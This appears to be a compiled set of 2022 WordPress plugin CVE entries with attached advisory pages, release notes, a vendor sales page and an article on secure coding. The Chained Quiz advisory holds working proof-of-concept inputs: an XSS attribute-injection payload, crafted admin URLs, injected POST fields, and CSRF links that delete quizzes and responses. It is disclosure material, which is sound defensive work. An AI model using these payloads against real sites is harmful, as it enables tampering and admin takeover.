The WP OAuth Server (OAuth Authentication) WordPress plugin before 3.4.2 does not have CSRF check when regenerating secrets, which could allow attackers to make logged in admins regenerate the secret of an arbitrary client given they know the client ID

CVE-2022-3926

Cross-Site Request Forgery (CSRF) vulnerability in Advanced Booking Calendar plugin <= 1.7.1 on WordPress.

**Solution**

No patched version is available. No reply from the vendor.

minhtuanact discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Advanced Booking Calendar Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has not been known to be fixed yet.

**4 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-45824: WordPress Advanced Booking Calendar plugin <= 1.7.1 - Multiple Cross-Site Scripting (CSRF) vulnerabilities - Patchstack

Unauth. SQL Injection (SQLi) vulnerability in Advanced Booking Calendar plugin <= 1.7.1 on WordPress.

**Solution**

No patched version is available. No reply from the vendor.

minhtuanact discovered and reported this SQL Injection vulnerability in WordPress Advanced Booking Calendar Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information and creating new administrator accounts. This vulnerability has not been known to be fixed yet.

**4 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-45822: WordPress Advanced Booking Calendar plugin <= 1.7.1 - Unauth. SQL Injection (SQLi) vulnerability - Patchstack

Cross-site scripting vulnerability in Salon booking system versions prior to 7.9 allows a remote unauthenticated attacker to inject an arbitrary script.

**The WordPress _Booking plugin_  
made for High Demanding _Small Business_**  
**We automatically schedule your clients' appointments,  
while your staff is busy at the work**

*   5 minutes setup
*   Flexible scheduling
*   Mobile app for salon staff
*   First class support
*   1 price/Unlimited usage

**A lot of tools to save you a ton of hours**

**Super flexible scheduling rules**

**Send email and sms notifications, reminders..**

**A mobile Web app for salon staff**

**Collect more customers feedback and reviews**

**Create coupons code or discounts**

**Customers database and personal booking stats**

**Accept online payments, tips and deposit**

**Customers personal account page**

**Customizable booking form**

**READY TO ACCEPT ONLINE PAYMENTS  
WITH MULTIPLE GATEWAYS**

Do you want a custom one?

**TESTIMONIALS**

**AN APPOINTMENT BOOKING SYSTEM  
**EQUIPPED WITH POWERFUL INTEGRATIONS****

**SMS NOTIFICATIONS**

Send SMS notifications and reminders to your customers using the most popular platforms.

**GOOGLE CALENDAR**

Synchronize all the reservation with your Google Calendar account also you can add new reservations from your Google Calendar into Salon Booking System plugin.

**AN APPOINTMENT BOOKING SYSTEM  
**THAT FITS FOR DIFFERENT KIND OF BUSINESS****

**Let your project make  
a big step forward today**

  
**79€** (yearly billed)  
Don't worry about the install and setup,  
we'll take care of them.

Salonbookingsystem OÜ - Harju maakond, Tallinn, Lasnamäe linnaosa, Lõõtsa tn 5-11, 11415 - REG NUMBER 14522788 - VAT EE102246021

CVE-2022-43487: Salon Booking System

Improper authentication vulnerability in WordPress versions prior to 6.0.3 allows a remote unauthenticated attacker to obtain the email address of the user who posted a blog using the WordPress Post by Email Feature.

**WordPress 6.0.3** is now available!

This release features several security fixes. Because this is a **security release**, it is recommended that you update your sites immediately. All versions since WordPress 3.7 have also been updated.

WordPress 6.0.3 is a short-cycle release. The next major release will be version 6.1 planned for November 1, 2022.

If you have sites that support automatic background updates, the update process will begin automatically.

You can download WordPress 6.0.3 from WordPress.org, or visit your WordPress Dashboard, click “Updates”, and then click “Update Now”.

For more information on this release, please visit the HelpHub site.

**Security updates included in this release**

The security team would like to thank the following people for responsibly reporting vulnerabilities, and allowing them to be fixed in this release.

*   Stored XSS via wp-mail.php (post by email) – Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. via JPCERT
*   Open redirect in \`wp\_nonce\_ays\` – devrayn
*   Sender’s email address is exposed in wp-mail.php – Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. via JPCERT
*   Media Library – Reflected XSS via SQLi – Ben Bidner from the WordPress security team and Marc Montpas from Automattic independently discovered this issue
*   CSRF in wp-trackback.php – Simon Scannell
*   Stored XSS via the Customizer – Alex Concha from the WordPress security team
*   Revert shared user instances introduced in 50790 – Alex Concha and Ben Bidner from the WordPress security team
*   Stored XSS in WordPress Core via Comment Editing – Third-party security audit and Alex Concha from the WordPress security team
*   Data exposure via the REST Terms/Tags Endpoint – Than Taintor
*   Content from multipart emails leaked – Thomas Kräftner
*   SQL Injection due to improper sanitization in \`WP\_Date\_Query\` – Michael Mazzolini
*   RSS Widget: Stored XSS issue – Third-party security audit
*   Stored XSS in the search block – Alex Concha of the WP Security team
*   Feature Image Block: XSS issue – Third-party security audit
*   RSS Block: Stored XSS issue – Third-party security audit
*   Fix widget block XSS – Third-party security audit

**Thank you to these WordPress contributors**

This release was led by Alex Concha, Peter Wilson, Jb Audras, and Sergey Biryukov at mission control. Thanks to Jonathan Desrosiers, Jorge Costa, Bernie Reiter and Carlos Bravo for their help on package updates.

WordPress 6.0.3 would not have been possible without the contributions of the following people. Their asynchronous coordination to deliver several fixes into a stable release is a testament to the power and capability of the WordPress community.

Alex Concha, Colin Stewart, Daniel Richards, David Baumwald, Dion Hulse, ehtis, Garth Mortensen, Jb Audras, John Blackbourn, John James Jacoby, Jonathan Desrosiers, Jorge Costa, Juliette Reinders Folmer, Linkon Miyan, martin.krcho, Matias Ventura, Mukesh Panchal, Paul Kevan, Peter Wilson, Robert AndersonRobin, Sergey Biryukov, Sumit Bagthariya, Teddy Patriarca, Timothy Jacobs, vortfu, and Česlav Przywara.

_Thanks to @peterwilsoncc for proofreading._

CVE-2022-43504: WordPress 6.0.3 Security Release

Cross-Site Request Forgery (CSRF) vulnerability in Oceanwp sticky header plugin <= 1.0.8 on WordPress.

**Solution**

No patched version is available. No reply from the vendor.

Rasi discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Oceanwp sticky header Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-35730: WordPress Oceanwp sticky header plugin <= 1.0.8 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

Reflected Cross-Site Scripting (XSS) vulnerability in 2kb Amazon Affiliates Store plugin <=2.1.5 on WordPress.

**Solution**

No patched version is available. No reply from the vendor.

ptsfence discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress 2kb Amazon Affiliates Store Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**1 other known vulnerability for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-40968: WordPress 2kb Amazon Affiliates Store plugin <= 2.1.5 - Auth. Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

The Chained Quiz plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.2.4. This is due to missing nonce validation on the list_questions() function. This makes it possible for unauthenticated attackers to delete questions from quizzes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

**WordPress plugin Chained Quiz <= 1.3.2 multiple vulnerabilities**

**Author: Muhammad Zeeshan (Xib3rR4dAr)**  
Date: November 24, 2022

**XSS**

**Description:**  
Multiple endpoints are vulnerable to XSS. When a logged in admin will visit a URL shared by an attacker, XSS will trigger which can be exploited to add a new admin user on website. sanitize_text_field is used while esc_attr should've been used.

**Vulnerable Files:**

    chained-quiz/controllers/completed.php
    chained-quiz/views/completed.html.php
    and more
    

**Payload:**

" onmouseover=alert(1) style=position:absolute;width:100%;height:100%;top:0;left:0; a

**URL Encoded Payload:**

%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a

**PoC:**  
While logged in as admin, visiting following crafted requests will trigger XSS:

    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=&datef=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&dnf=&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&date=&datef=&points=&pointsf=&result_id=0&source_url=
    
    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&datef=&points=&pointsf=&result_id=0&source_url=
    

Similarly, other endpoints in the plugin are also vulnerable to Admin Stored XSS even if DISALLOW_UNFILTERED_HTML is set to true, some are:

*   Visit \[Social Sharing page\](http://example.com/wp-admin/admin.php?page=chainedquiz\_social\_sharing as admin) and set Facebook App ID input to: " onclick=alert(1) a
*   Visit Integrations page as admin and set MailChimp API Key to : " onclick=alert(1) a  
    XSS will trigger when input box will be clicked, or when page is hovered depending on XSS payload that is used.

    POST /wp-admin/admin.php?page=chainedquiz_social_sharing
    ...
    facebook_appid=" onclick=alert(1) a
    
    POST /wp-admin/admin.php?page=chainedquiz_integrations&tab=mailchimp
    ...
    api_key=someapikey" onclick=alert(1) a
    

**CSRF**

Delete a quiz:

    /wp-admin/admin.php?page=chained_quizzes&del=1&id=2
    

Delete submitted responses:

    /wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&offset=0&ob=tC.id&dir=desc&del=5
    

Delete a question from a quiz:

    /wp-admin/admin.php?page=chainedquiz_questions&quiz_id=1&del=1&id=1
    

Copy Quiz:

    /wp-admin/admin.php?page=chainedquiz_questions&quiz_id=1&del=1&id=1

CVE-2022-4220: WP plugin Chained Quiz multiple vulnerabilities

The Chained Quiz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dn' parameter on the 'chainedquiz_list' page in versions up to, and including, 1.3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVE-2022-4213: Vulnerability Advisories Continued - Wordfence

Today's threat landscape is constantly evolving, and now more than ever, organizations and businesses in every sector have a critical need to consistently produce and maintain secure software. While some verticals - like the finance industry, for example - have been subject to regulatory and compliance requirements for some time, we are seeing a steady increase in attention on cybersecurity best practices at the highest levels of government, with the US, UK, and Australia all shining very recent light on the need for secure development at every stage of the SDLC.

Despite this, attackers are constantly finding new ways to bypass even the most advanced protections and defenses. For example, many have shifted their focus from delivering malware to instead compromising APIs, or launching targeted attacks against a supply chain. And while those high-level incidents are happening with much greater frequency, so too are the more simplistic exploits like cross-site scripting and SQL injection, both of which have been a scourge on cybersecurity defenses for decades. Just last month, a critical SQL injection vulnerability was reported in a WooCommerce WordPress plugin, with a 9.8/10 severity rating.

It's becoming apparent that while cybersecurity platforms and defenses are critical components in defense against modern attacks, what is truly needed is secure code that can be deployed free from vulnerabilities. And that requires a deliberate and committed lift in secure coding standards, actioned by security-aware developers.

Many developers say they are willing to champion security and commit to higher standards of code quality and secure output, but they can't do it alone. We cannot afford to ignore developer needs in the fight against common vulnerabilities, and they need the support of right-fit tools and training, as well as a reworking of the traditional metrics by which they are often judged by their employers and organizations.

****Why Most Developers Don't Already Prioritize Security****

Coding best practices have continued to evolve over the years, in response to business needs and market trends. In the past, most applications were created using the so-called waterfall development model where software engineers worked to get their code ready to meet an ongoing series of milestones or goals before moving on to the next phase of development. Waterfall tended to support the development of programs that, having met all of the previous milestones along the way, were free from bugs or operational flaws by the time they were ready for the production environment. But by today's standards, it was painfully slow, with sometimes 18 months or more between starting a project and getting to the finish line. And that's not going to fly in most companies these days.

The agile method tended to replace Waterfall, putting a much greater emphasis on speed. And this was followed by DevOps, which is built for even more speed by combining development and operations together to ensure that programs are ready for production almost as soon as they clear the final development tweaks.

Putting speed over security, and nearly everything else beyond functionality, was a necessity as the business environment evolved. In a cloud-based world where everyone is online all the time, and mobile transactions by the millions can happen every few seconds, getting software deployed and into the continuous integration and continuous delivery (CI/CD) pipeline as quickly as possible is mission critical for businesses.

It's not that organizations didn't care about security. It's just that in the competitive business environment that exists in most industries, speed was seen as more important. And developers who could match that speed thrived to the point where it became the primary means by which their job performance was judged.

Now that advanced attacks are ramping up so dramatically, deploying vulnerable code is becoming a liability. The preference is once again shifting, with security increasingly becoming the primary focus of software development, with speed a close second. Bolting on security after the fact is not only dangerous, it also slows the process of deploying software. That has led to the rise of the DevSecOps methodology that attempts to merge speed and security together to help generate secure code, and consider security as a shared responsibility. But developers trained for pure speed can't become functionally security-aware without a lot of support from their organizations.

****What Developers Need to Truly Make an Impact on Vulnerability Reduction****

The good news is that most developers want to see a shift to secure coding and a reprioritizing of security as part of the development process. In a comprehensive survey conducted by Evans Data of over 1,200 professional developers actively working around the world earlier this year, the overwhelming majority said they were supportive of the concept of creating secure code. Most also expected it to become a priority in their organizations. However, only 8% of the respondents said that writing secure code was easy to accomplish. That leaves a lot of room for improvement within most organizations' development teams between what is needed, and what is required in order to get there.

Simply mandating secure code won't get the job done, and without effort to build the right skills and awareness, it will be highly disruptive to their workflow. Development teams need to exist in an environment that nurtures their security mindset, and promotes a culture of shared responsibility.

The biggest thing that is needed is better training for them, followed by tools that help make secure coding a seamless part of their workflow. And the program should be customized so that less experienced developers can begin their training by learning how to recognize the kinds of common vulnerabilities that often creep into code, with lots of hands-on learning and examples. Meanwhile, more advanced developers who demonstrate their security skills can instead be tasked with more complex bugs and perhaps even advanced threat modeling concepts.

In addition to funding and supporting training programs, including giving developers enough time away from coding in order to properly participate in those programs, organizations also need to change the way that their cohort is evaluated. The primary metric for rewarding developers needs to shift away from raw speed. Instead, evaluations could reward those who can create secure code that is free from vulnerabilities or exploits. Yes, speed can be an evaluated factor as well, but first and foremost, code needs to be secure, and modern development needs to forge a path where security at speed is no longer a myth.

Shipping insecure or vulnerable code should not be an acceptable business risk, and bolting on security after the fact is becoming increasingly ineffective. Thankfully, the best weapon to fight this disturbing trend is having the developer community produce secure code that attackers can't exploit. Most developers are willing to step up to that challenge; give them the support to make it happen.

_Secure Code Warrior is one of four companies named in the Gartner® Cool Vendors™ in Software Engineering: Enhancing Developer Productivity report. We're ready to help development teams navigate the complexities of secure software development with tools that make sense in their world._ _Learn more__._

_**Note —** This article is written and contributed by By Matias Madou, CTO & Co-Founder, Secure Code Warrior._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#wordpress